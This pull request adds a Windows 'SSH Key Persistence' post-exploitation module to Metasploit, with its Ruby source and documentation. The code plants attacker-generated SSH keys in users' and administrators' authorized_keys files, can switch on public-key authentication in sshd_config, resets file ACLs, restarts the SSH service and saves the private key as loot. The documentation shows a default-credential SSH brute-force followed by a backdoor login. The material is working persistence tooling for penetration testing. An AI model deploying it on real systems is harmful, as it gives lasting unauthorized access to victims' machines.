### PR TITLE
Add windows ssh persistence

### DIFF
--- a/documentation/modules/post/windows/manage/sshkey_persistence.md
+++ b/documentation/modules/post/windows/manage/sshkey_persistence.md
@@ -21,7 +21,9 @@ This module will add an SSH key to a specified user (or all), to allow remote lo
 
   **SSHD_CONFIG**
 
-  Location of the sshd_config file on the remote system.  We use this to determine if the authorized_keys file location has changed on the system.  If it hasn't, we default to .ssh/authorized_keys
+  Location of the sshd_config file on the remote system.
+  We use this to determine if the authorized_keys file location has changed on the system.
+  If it hasn't, we default to .ssh/authorized_keys
 
   **USERNAME**
 
@@ -30,25 +32,29 @@ This module will add an SSH key to a specified user (or all), to allow remote lo
   **PUBKEY**
 
   A public key to use.  If not provided, a pub/priv key pair is generated automatically
-  
+
   **ADMIN_KEY_FILE**
-  
+
   Location of public keys for Administrator level accounts
-  
+
   **ADMIN**
-  
+
   Add public keys for gaining access to Administrator level accounts
-  
+
   **EDIT_CONFIG**
-  
-  Allow the module to edit the sshd_config to enable public key authentication 
+
+  Allow the module to edit the sshd_config to enable public key authentication
+
+## Scenarios
 
 Get initial access
 
     msf auxiliary(ssh_login) > exploit
     
     [*] SSH - Starting bruteforce
-    [+] SSH - Success: 'tiki:tiki' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+    [+] SSH - Success: 'tiki:tiki' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),
+    46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic
+    #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
     [!] No active DB -- Credential data will not be saved!
     [*] Command shell session 1 opened (192.168.2.229:38886 -> 192.168.2.190:22) at 2016-06-19 09:52:48 -0400
     [*] Scanned 1 of 1 hosts (100% complete)

--- a/documentation/modules/post/windows/manage/sshkey_persistence.md
+++ b/documentation/modules/post/windows/manage/sshkey_persistence.md
@@ -4,7 +4,7 @@ This module will add an SSH key to a specified user (or all), to allow remote lo
 
   This module has been tested against:
 
-1. Windows 10, 1809
+1. Windows 10, 1903
 
 ## Verification Steps
 
@@ -42,10 +42,6 @@ This module will add an SSH key to a specified user (or all), to allow remote lo
   **EDIT_CONFIG**
   
   Allow the module to edit the sshd_config to enable public key authentication 
-
-## Scenarios
-
-### Windows 10, 1809
 
 Get initial access
 

--- a/documentation/modules/post/windows/manage/sshkey_persistence.md
+++ b/documentation/modules/post/windows/manage/sshkey_persistence.md
@@ -1,0 +1,87 @@
+This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
+
+### Creating A Testing Environment
+
+  This module has been tested against:
+
+1. Windows 10, 1809
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  3. Do: `use post/windows/manage/sshkey_persistence`
+  4. Do: `set session #`
+  5. Optional Do: `set USERNAME`
+  6. Optional Do: `set SSHD_CONFIG`
+  7. Do: `run`
+
+
+## Options
+
+  **SSHD_CONFIG**
+
+  Location of the sshd_config file on the remote system.  We use this to determine if the authorized_keys file location has changed on the system.  If it hasn't, we default to .ssh/authorized_keys
+
+  **USERNAME**
+
+  If set, we only write our key to this user.  If not, we'll write to all users
+
+  **PUBKEY**
+
+  A public key to use.  If not provided, a pub/priv key pair is generated automatically
+  
+  **ADMIN_KEY_FILE**
+  
+  Location of public keys for Administrator level accounts
+  
+  **ADMIN**
+  
+  Add public keys for gaining access to Administrator level accounts
+  
+  **EDIT_CONFIG**
+  
+  Allow the module to edit the sshd_config to enable public key authentication 
+
+## Scenarios
+
+### Windows 10, 1809
+
+Get initial access
+
+    msf auxiliary(ssh_login) > exploit
+    
+    [*] SSH - Starting bruteforce
+    [+] SSH - Success: 'tiki:tiki' 'uid=1000(tiki) gid=1000(tiki) groups=1000(tiki),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
+    [!] No active DB -- Credential data will not be saved!
+    [*] Command shell session 1 opened (192.168.2.229:38886 -> 192.168.2.190:22) at 2016-06-19 09:52:48 -0400
+    [*] Scanned 1 of 1 hosts (100% complete)
+    [*] Auxiliary module execution completed
+
+Use the post module to write the ssh key
+
+    msf auxiliary(ssh_login) > use post/linux/manage/sshkey_persistence 
+    msf post(sshkey_persistence) > set SESSION 1
+    SESSION => 1
+    msf post(sshkey_persistence) > set CREATESSHFOLDER true
+    CreateSSHFolder => true    
+    msf5 post(windows/manage/sshkey_persistence) > run
+    
+    [*] Checking SSH Permissions
+    [*] Authorized Keys File: .ssh/authorized_keys
+    [+] Storing new private key as /Users/dwelch/.msf4/loot/20200205161837_default_172.16.128.153_id_rsa_706898.txt
+    [*] Adding key to C:\Users\Dean Welch\.ssh\authorized_keys
+    [+] Key Added
+    [*] Adding key to C:\Users\testAccount\.ssh\authorized_keys
+    [+] Key Added
+    [*] Post module execution completed
+
+Verify our access works
+
+    ssh -i /Users/dwelch/.msf4/loot/20200205153101_default_172.16.128.153_id_rsa_457054.txt testAccount@172.16.128.153
+    
+    Microsoft Windows [Version 10.0.18362.592]
+    (c) 2019 Microsoft Corporation. All rights reserved.
+    
+    testaccount@DESKTOP-V8L6UUD C:\Users\testAccount>
+

--- a/modules/post/windows/manage/sshkey_persistence.rb
+++ b/modules/post/windows/manage/sshkey_persistence.rb
@@ -1,0 +1,191 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'sshkey'
+
+class MetasploitModule < Msf::Post
+  Rank = GoodRanking
+
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'SSH Key Persistence',
+        'Description'    => %q{
+          This module will add an SSH key to a specified user (or all), to allow
+          remote login via SSH at any time.
+        },
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Dean Welch <dean_welch[at]rapid7.com>'
+          ],
+        'Platform'       => [ 'windows' ],
+        'SessionTypes'   => [ 'meterpreter', 'shell' ]
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [false, 'User to add SSH key to (Default: all users on box)' ]),
+        OptPath.new('PUBKEY', [false, 'Public Key File to use. (Default: Create a new one)' ]),
+        OptString.new('SSHD_CONFIG', [true, 'sshd_config file', 'C:\ProgramData\ssh\sshd_config' ]),
+        OptString.new('ADMIN_KEY_FILE', [true, 'Admin key file', 'C:\ProgramData\ssh\administrators_authorized_keys' ]),
+        OptBool.new('EDIT_CONFIG', [true, 'Edit ssh config to allow public key authentication', false ]),
+        OptBool.new('ADMIN', [true, 'Add keys for administrator accounts', false ]),
+        OptBool.new('CREATESSHFOLDER', [true, 'If no .ssh folder is found, create it for a user', false ])
+      ], self.class
+    )
+  end
+
+  def run
+
+    sep = separator
+
+    sshd_config = read_file(datastore['SSHD_CONFIG'])
+
+    print_status('Checking SSH Permissions')
+    unless pub_key_auth_allowed?(sshd_config)
+      enable_pub_key_auth(sshd_config) if datastore['EDIT_CONFIG']
+    end
+
+    auth_key_file = auth_key_file_name(sshd_config)
+
+    print_status("Authorized Keys File: #{auth_key_file}")
+
+    auth_key_folder = auth_key_file.split('/')[0...-1].join(sep)
+    auth_key_file = auth_key_file.split('/')[-1]
+
+    paths = []
+    if datastore['USERNAME']
+      grab_user_profiles.each { |profile|
+        paths << "#{profile["ProfileDir"]}#{sep}#{auth_key_folder}" if profile['UserName'] == datastore['USERNAME']
+      }
+    end
+
+    if datastore['ADMIN']    # SSH keys for admin accounts are stored in a separate location
+      admin_auth_key_folder = datastore['ADMIN_KEY_FILE'].split(sep)[0...-1].join(sep)
+      admin_auth_key_file = datastore['ADMIN_KEY_FILE'].split(sep)[-1]
+
+      print_status("Admin Authorized Keys File: #{admin_auth_key_file}")
+
+      write_key([admin_auth_key_folder], admin_auth_key_file, sep)
+    end
+
+    if !datastore['USERNAME'] and !datastore['ADMIN']
+      grab_user_profiles.each { |profile|
+        paths << "#{profile['ProfileDir']}#{sep}#{auth_key_folder}"
+      }
+    end
+
+    if datastore['CREATESSHFOLDER'] == true
+      create_ssh_folder(paths)
+    end
+
+    paths = paths.select { |d| directory?(d) }
+    unless paths.empty?
+      write_key(paths, auth_key_file, sep)
+    end
+
+    restart_openssh
+  end
+
+  def enable_pub_key_auth(sshd_config)
+    sshd_config = sshd_config.sub(/^.*(PubkeyAuthentication).*$/, 'PubkeyAuthentication yes')
+    write_file(datastore['SSHD_CONFIG'], sshd_config)
+  end
+
+  def pub_key_auth_allowed?(sshd_config)
+    /^PubkeyAuthentication[\s]+(?<pub_key>yes|no)/ =~ sshd_config
+    if pub_key && pub_key == 'no'
+      print_error('Pubkey Authentication disabled')
+    elsif pub_key
+      vprint_good("Pubkey set to #{pub_key}")
+    end
+  end
+
+  def auth_key_file_name(sshd_config)
+    /^AuthorizedKeysFile[\s]+(?<auth_key_file>[\w%\/\.]+)/ =~ sshd_config
+    if auth_key_file
+      auth_key_file = auth_key_file.gsub('%h', '')
+      auth_key_file = auth_key_file.gsub('%%', '%')
+      if auth_key_file.start_with? '/'
+        auth_key_file = auth_key_file[1..-1]
+      end
+    else
+      auth_key_file = '.ssh/authorized_keys'
+    end
+    auth_key_file
+  end
+
+  def create_ssh_folder(paths)
+    vprint_status("Attempting to create ssh folders that don't exist")
+    paths.each do |p|
+      unless directory?(p)
+        print_status("Creating #{p} folder")
+        session.fs.dir.mkdir(p)
+      end
+    end
+  end
+
+  def restart_openssh
+    cmd_exec('net stop "OpenSSH SSH Server"')
+    cmd_exec('net start "OpenSSH SSH Server"')
+  end
+
+  def set_pub_key_file_permissions(file)
+    cmd_exec("icacls #{file} /inheritance:r")
+    cmd_exec("icacls #{file} /grant SYSTEM:(F)")
+    cmd_exec("icacls #{file} /grant BUILTIN\\Administrators:(F)")
+  end
+
+  def separator
+    if session.type == "meterpreter"
+      sep = session.fs.file.separator
+    else
+      # Guess, but it's probably right
+      sep = '\\'
+    end
+    sep
+  end
+
+  def write_key(paths, auth_key_file, sep)
+    if datastore['PUBKEY'].nil?
+      key = SSHKey.generate
+      our_pub_key = key.ssh_public_key
+      loot_path = store_loot("id_rsa", "text/plain", session, key.private_key, "ssh_id_rsa", "OpenSSH Private Key File")
+      print_good("Storing new private key as #{loot_path}")
+    else
+      our_pub_key = ::File.read(datastore['PUBKEY'])
+    end
+    paths.each do |path|
+      path.chomp!
+      authorized_keys = "#{path}#{sep}#{auth_key_file}"
+      print_status("Adding key to #{authorized_keys}")
+      append_file(authorized_keys, "\n#{our_pub_key}")
+      print_good("Key Added")
+      set_pub_key_file_permissions(authorized_keys)
+      if datastore['PUBKEY'].nil?
+        path_array = path.split(sep)
+        path_array.pop
+        user = path_array.pop
+        credential_data = {
+          origin_type: :session,
+          session_id: session_db_id,
+          post_reference_name: refname,
+          private_type: :ssh_key,
+          private_data: key.private_key.to_s,
+          username: user,
+          workspace_id: myworkspace_id
+        }
+
+        create_credential(credential_data)
+      end
+    end
+  end
+end


### PR DESCRIPTION
Adds an ssh key persistence module for windows similar to `post/linux/manage/sshkey_persistence`

## Verification

List the steps needed to make sure this thing works

 [ ] Start msfconsole
 [ ] Exploit a box via whatever method
 [ ] Do: `use post/windows/manage/sshkey_persistence`
 [ ] Do: `set session #`
 [ ] Optional Do: `set USERNAME`
 [ ] Optional Do: `set SSHD_CONFIG`
 [ ] Do: `run`

